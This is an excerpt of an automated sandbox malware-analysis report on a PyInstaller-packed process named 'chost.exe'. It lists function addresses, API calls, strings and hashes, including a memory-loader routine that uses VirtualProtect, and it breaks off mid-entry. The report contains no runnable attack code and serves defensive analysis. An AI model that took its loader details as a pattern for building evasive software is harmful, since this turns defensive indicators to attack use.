Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: 69f2f3c12087186f24af45d4eae6b35d6b51f5cb6cd45e42dc518d014c53c1a0
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: 92112E32619B8282EB718F26F440259B7E5FB88B94F588274EB8D47769DF3CD551CB00

Function 00007FF6943807AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6943807DC
GetDriveTypeW.KERNEL32 ref: 00007FF69438081C

Strings

:, xrefs: 00007FF694380805

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: 881db87630076f0d7b2747036c5ec8d92c0139f5c5b3e50d5e61623f4bd89992
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: 82017C3291C20786FB70AB7294A627EB3A0EF44708F81807EE55DC6791EE2CE544CA14

Analysis Process: chost.exePID: 280, Parent PID: 4336COMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.2%
Total number of Nodes:	909
Total number of Limit Nodes:	85

Executed Functions

Function 00007FF694361000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Py_GIL_DISABLED, xrefs: 00007FF694363AF4
pkg, xrefs: 00007FF6943639BE
MEI, xrefs: 00007FF694363933
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF694363E0A
bye-runtime-tmpdir, xrefs: 00007FF694363B68
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF694363A17, 00007FF694363A2F, 00007FF694363A9B
_PYI_ARCHIVE_FILE, xrefs: 00007FF6943638D2, 00007FF6943639FF
Could not create temporary directory!, xrefs: 00007FF694363CBF
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF694363D12
pyi-python-flag, xrefs: 00007FF694363AD6
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF694363C61
pyi-contents-directory, xrefs: 00007FF694363B8D
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF694363EA6
Failed to convert DLL search path!, xrefs: 00007FF694363DDC
Failed to load splash screen resources!, xrefs: 00007FF694363E85
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6943639DE
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF694363882, 00007FF6943638AF
pyi-disable-windowed-traceback, xrefs: 00007FF694363BB2
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF694363971
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF694363EBB
Failed to remove temporary directory: %s, xrefs: 00007FF694363FC3
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF694363BE8
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF694363A0B, 00007FF694363CD4, 00007FF694363F6B
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF694363B32
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF694363D35
Failed to start splash screen!, xrefs: 00007FF694363ED4
VCRUNTIME140.dll, xrefs: 00007FF694363DB1
_PYI_SPLASH_IPC, xrefs: 00007FF694363A23, 00007FF694363EF5

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
Instruction ID: 6d5ec9cbab3b320319b505cf61f02d885338274f5c20f9d9196418b22e6e0cf8
Opcode Fuzzy Hash: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
Instruction Fuzzy Hash: 11326C21A0C68791FA399B3294D62B976A1EF45784F84C0BEDA5DC36D6EF2CE564C300

Function 00007FFDF6A41A0F Relevance: 23.6, APIs: 5, Strings: 8, Instructions: 858COMMON

Download Yara Rule

Strings

GET , xrefs: 00007FFDF6A8B8E8
CONNE, xrefs: 00007FFDF6A8B95A
..\s\ssl\record\ssl3_record.c, xrefs: 00007FFDF6A8ACF8, 00007FFDF6A8AEA7, 00007FFDF6A8B01D, 00007FFDF6A8B06B, 00007FFDF6A8B09B, 00007FFDF6A8B0C8, 00007FFDF6A8B0F5, 00007FFDF6A8B1A2, 00007FFDF6A8B1EB, 00007FFDF6A8B330, 00007FFDF6A8B358, 00007FFDF6A8B38F, 00007FFDF6A8B3C4, 00007FFDF6A8B445, 00007FFDF6A8B489, 00007FFDF6A8B4AB, 00007FFDF6A8B74F, 00007FFDF6A8B7CE, 00007FFDF6A8B7FB, 00007FFDF6A8B828, 00007FFDF6A8B861, 00007FFDF6A8B88E, 00007FFDF6A8B97F, 00007FFDF6A8B9B9, 00007FFDF6A8BA27, 00007FFDF6A8BA5D
HEAD , xrefs: 00007FFDF6A8B929
POST , xrefs: 00007FFDF6A8B90B
PUT , xrefs: 00007FFDF6A8B943
ssl3_get_record, xrefs: 00007FFDF6A8ACF1, 00007FFDF6A8AEA0, 00007FFDF6A8B016, 00007FFDF6A8B064, 00007FFDF6A8B094, 00007FFDF6A8B0BC, 00007FFDF6A8B0E9, 00007FFDF6A8B196, 00007FFDF6A8B1DF, 00007FFDF6A8B324, 00007FFDF6A8B34C, 00007FFDF6A8B3B8, 00007FFDF6A8B439, 00007FFDF6A8B593, 00007FFDF6A8B743, 00007FFDF6A8B7C2, 00007FFDF6A8B7EF, 00007FFDF6A8B821, 00007FFDF6A8B855, 00007FFDF6A8B887, 00007FFDF6A8B973, 00007FFDF6A8B9AD, 00007FFDF6A8BA20, 00007FFDF6A8BA51
, xrefs: 00007FFDF6A8B187

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID:
String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
API String ID: 0-2781224710
Opcode ID: d39c98ad81025c605fbd399e55ec7b0c2b6e35b2a65b57f07efd4e8fcf478a2e
Instruction ID: e6629e7c38bd80fcf9bfc05287f2580517682b5c50397124ad9056f48d7cdd39
Opcode Fuzzy Hash: d39c98ad81025c605fbd399e55ec7b0c2b6e35b2a65b57f07efd4e8fcf478a2e
Instruction Fuzzy Hash: 5782C071B09A8282FB649B21D460BB973A8EF42B44F448136DA6D4BEDEDF3CE545C700

Function 00007FFDF7069260 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 513
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF706932F
00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF706940E
00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF7069430
00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF70695EE
00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF7069617

Strings

nolock, xrefs: 00007FFDF7069775
immutable, xrefs: 00007FFDF70697AD
-journal, xrefs: 00007FFDF70695F6

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: 00007E142010
String ID: -journal$immutable$nolock
API String ID: 2636501453-4201244970
Opcode ID: 3767d4123ebb06c638636b3ec1cd7d1febdd0afadb762bae8c82de5b3a0db073
Instruction ID: bf70a376d763701f48e18acd1103eea3739d312f9192d5f8fbee9028229e8428
Opcode Fuzzy Hash: 3767d4123ebb06c638636b3ec1cd7d1febdd0afadb762bae8c82de5b3a0db073
Instruction Fuzzy Hash: DA32912AB1978286EB548F259861BB937A1FF44B94F084239CA6E47BD8DF3CE455D300

Function 00007FFDF70CD030 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 441COMMON

Download Yara Rule

APIs

00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF70CD6A7

Strings

misuse, xrefs: 00007FFDF70CD0A2
API call with %s database connection pointer, xrefs: 00007FFDF70CD084
unopened, xrefs: 00007FFDF70CD07D
invalid, xrefs: 00007FFDF70CD072
NULL, xrefs: 00007FFDF70CD05D
%s at line %d of [%.10s], xrefs: 00007FFDF70CD0AE
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDF70CD095

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: 00007E142010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
API String ID: 2636501453-509082904
Opcode ID: 853b01d5efd108e7c5e040f14a2816657269065cf72fbe55ca4de533c68ede99
Instruction ID: 0f04c14153c8e8fb265b755ee4015a13dae2a455388a520f94c35e2a2f34c811
Opcode Fuzzy Hash: 853b01d5efd108e7c5e040f14a2816657269065cf72fbe55ca4de533c68ede99
Instruction Fuzzy Hash: 96127A2AB09A4285EB549F25E460BF967B1FF84B88F584031DE6E877D8DF3CE455A300

Function 00007FF694385C70 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF694385CB5

Part of subcall function 00007FF694385608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438561C

Part of subcall function 00007FF69437A9B8: HeapFree.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9CE
Part of subcall function 00007FF69437A9B8: GetLastError.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9D8

Part of subcall function 00007FF69437A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF69437A94F,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437A979
Part of subcall function 00007FF69437A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF69437A94F,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437A99E

_get_daylight.LIBCMT ref: 00007FF694385CA4

Part of subcall function 00007FF694385668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438567C

_get_daylight.LIBCMT ref: 00007FF694385F1A
_get_daylight.LIBCMT ref: 00007FF694385F2B
_get_daylight.LIBCMT ref: 00007FF694385F3C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69438617C), ref: 00007FF694385F63

Strings

Eastern Summer Time, xrefs: 00007FF694386021
Eastern Standard Time, xrefs: 00007FF694386009

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction ID: 165b0f244d4f5d43ebf412c6ee025a54cbd7c9b00b4b973127669f67b7f806e3
Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction Fuzzy Hash: 3FD19D62A1824286EB34AF37D8D11B9A7A1EF84794F44C17DEA4DC7B96DE3CE441C740

Function 00007FF6943869D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF694386708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF694386749
Part of subcall function 00007FF694386708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6943867C7
Part of subcall function 00007FF694386708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF694386818

CreateFileW.KERNEL32 ref: 00007FF694386ADA
CreateFileW.KERNEL32 ref: 00007FF694386B2A
GetLastError.KERNEL32 ref: 00007FF694386B5A
GetFileType.KERNEL32 ref: 00007FF694386B6F
GetLastError.KERNEL32 ref: 00007FF694386B79
CloseHandle.KERNEL32 ref: 00007FF694386BAC
CloseHandle.KERNEL32 ref: 00007FF694386D0F
CreateFileW.KERNEL32 ref: 00007FF694386D44
GetLastError.KERNEL32 ref: 00007FF694386D53

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: 163e34ad10565bb3fe615f7e3a34a4ef17550527bb3377863564f117c90b8a52
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: 80C1A236B28A4285EB20CFB6C4906AC7771F749BA8B119269DE2ED77D4CF38E455C300

Function 00007FF694385EEC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF694385F1A

Part of subcall function 00007FF694385668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438567C

_get_daylight.LIBCMT ref: 00007FF694385F2B

Part of subcall function 00007FF694385608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438561C

_get_daylight.LIBCMT ref: 00007FF694385F3C

Part of subcall function 00007FF694385638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438564C

Part of subcall function 00007FF69437A9B8: HeapFree.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9CE
Part of subcall function 00007FF69437A9B8: GetLastError.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9D8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69438617C), ref: 00007FF694385F63

Strings

Eastern Summer Time, xrefs: 00007FF694386021
Eastern Standard Time, xrefs: 00007FF694386009

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
Instruction ID: 68bdfe0ab7c59c4bbe90852045afc8a49bb41bb64af145c24a555ec5f711f204
Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
Instruction Fuzzy Hash: EF513962A1864286E734EF33D8C15A9A661EB48794F44D17DEA4DC7B96DF3CE440CB40

Function 00007FFDF7019060 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 850librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFDF7019B20
GetProcAddress.KERNEL32 ref: 00007FFDF7019B4A
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FFDF7019BD4
VirtualProtect.KERNEL32 ref: 00007FFDF7019BF2

Strings

)tP, xrefs: 00007FFDF701908B

Memory Dump Source

Source File: 00000011.00000002.2382582292.00007FFDF7019000.00000080.00000001.01000000.0000001A.sdmp, Offset: 00007FFDF6B10000, based on PE: true

Associated: 00000011.00000002.2379308973.00007FFDF6B10000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF6B11000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF6B22000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF6B32000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF6B38000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF6B82000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF6B97000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF6BA7000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF6BAE000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF6BBC000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF6D9E000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF6E89000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF6E8B000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF6EC2000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF6EFF000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF6F5A000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF6FCB000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF7000000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2379354062.00007FFDF7013000.00000040.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000011.00000002.2382640671.00007FFDF701A000.00000004.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6b10000_chost.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID: )tP
API String ID: 3300690313-3907340667
Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
Instruction ID: 1fcad8f72d3a4d3330ea4055f5d732149817959530bd12d98c84b69aff9eccd9
Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
Instruction Fuzzy Hash: 816237267281D296E715CF38D4106BD76A0FB48789F045532EAAEC37CCEABCEA44D700

Function 00007FFDF70D4D90 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 370COMMON

Download Yara Rule

APIs

00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF70D501D
00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF70D50CE

Strings

database schema is locked: %s, xrefs: 00007FFDF70D4F76
out of memory, xrefs: 00007FFDF70D4E7F
statement too long, xrefs: 00007FFDF70D4FD3

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: 00007E142010
String ID: database schema is locked: %s$out of memory$statement too long
API String ID: 2636501453-1046679716
Opcode ID: d7ead36279c90daa057756ddfad70f15206fe592525cea6a1f02fdb4d24458d3
Instruction ID: 8ded6de232fba4913d7c83f284910066c9fc6355e6298257ba3e2bd49a80da77
Opcode Fuzzy Hash: d7ead36279c90daa057756ddfad70f15206fe592525cea6a1f02fdb4d24458d3
Instruction Fuzzy Hash: D8F1622AB0878186EB248B25D424BFA6BB1FF85B48F084135EE6D877D9DF7CE4459700

Function 00007FFDF7072210 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 581COMMON

Download Yara Rule

APIs

00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF70723CF

Strings

:memory:, xrefs: 00007FFDF707226E

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: 00007E142010
String ID: :memory:
API String ID: 2636501453-2920599690
Opcode ID: 994fae84a6960ca7360fad19935dedf210197b0f4901e298583c4b1942b2d421
Instruction ID: 4c68753bb09e594973df98adf2ac3a5bd9facb65b6f855e237227601786888b2
Opcode Fuzzy Hash: 994fae84a6960ca7360fad19935dedf210197b0f4901e298583c4b1942b2d421
Instruction Fuzzy Hash: 62427E6AF0978386EB648B25A560BB927B0FF84B84F045135DE6D877D8DF3CE4969300

Function 00007FF6943692F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF694369323
FindClose.KERNEL32 ref: 00007FF694369332

Memory Dump Source

